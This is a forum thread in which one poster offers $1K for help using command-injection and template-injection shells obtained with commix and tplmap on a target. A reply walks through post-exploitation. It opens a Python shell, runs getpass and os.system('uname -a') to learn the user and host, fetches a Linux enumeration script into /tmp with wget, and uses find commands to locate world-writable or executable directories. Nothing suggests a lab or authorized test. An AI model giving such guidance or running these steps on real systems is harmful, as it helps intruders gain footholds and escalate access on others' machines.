GreySec Forums

Full Version: Pseudo-terminal Shell....
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
i need to get answers quick no bs, I will pay 1K to whoever guides me through these two

i am on jabber at 
first one is a "pseudoterminal" i got from commix
wth no out put onlythe letters  A and B . 
Te second shell is from tplmap. its is a blind shell
 with the only outputs being true & false.
ill provide copy anx pasteoutput etc...
id appreciate any help. i stand b my word '1K'
for full guide on my shellz.
If commix only gives you A and B as output it is likely you have a false positive. Just to be sure you can try the following. Given you're trying to inject commands into a *nix based OS there is a good chance they might have the python interpreter installed. Try switching to a python shell instead, commix comes with this option. If i recall, a python shell is simply a python interpreter instance with the output relayed back to your box. Once you're switched to a python interpreter run the following:

>>>import getpass
>>>print getpass.getuser()

This will print the user within who's context you are working. Let's say you're working within the context of the user/process 'apache'. If it's reasonable to assume this process can make system calls try the following:

>>>import os
>>>import sys
>>>os.system("uname -a")

To find out more about the box you're on. If this returns output you can run bash commands between parenthesis and quotation marks. A couple of handy bash commands to have here would include the following:

wget -O /tmp/  # Shellscript for linux enumeration, drop in /tmp/ if world writable.

tar -xvf file.tar    # unzip tar to current directory

tar -xvf archive.tar -C [destination]  # unzip tar to destination

unzip -d destination_folder

which [util name]     # i.e. 'which wget' to get path etc

find ~           # lists everything in current directory

find /tmp/          # lists everything in tmp directory etc

find / -perm -o x -type d 2>/dev/null                    # find world-executable folders

find / \( -perm -o w -perm -o x \) -type d 2>/dev/null   # world-writeable & executable folders

find / -writable -type d 2>/dev/null              # list world writeable folders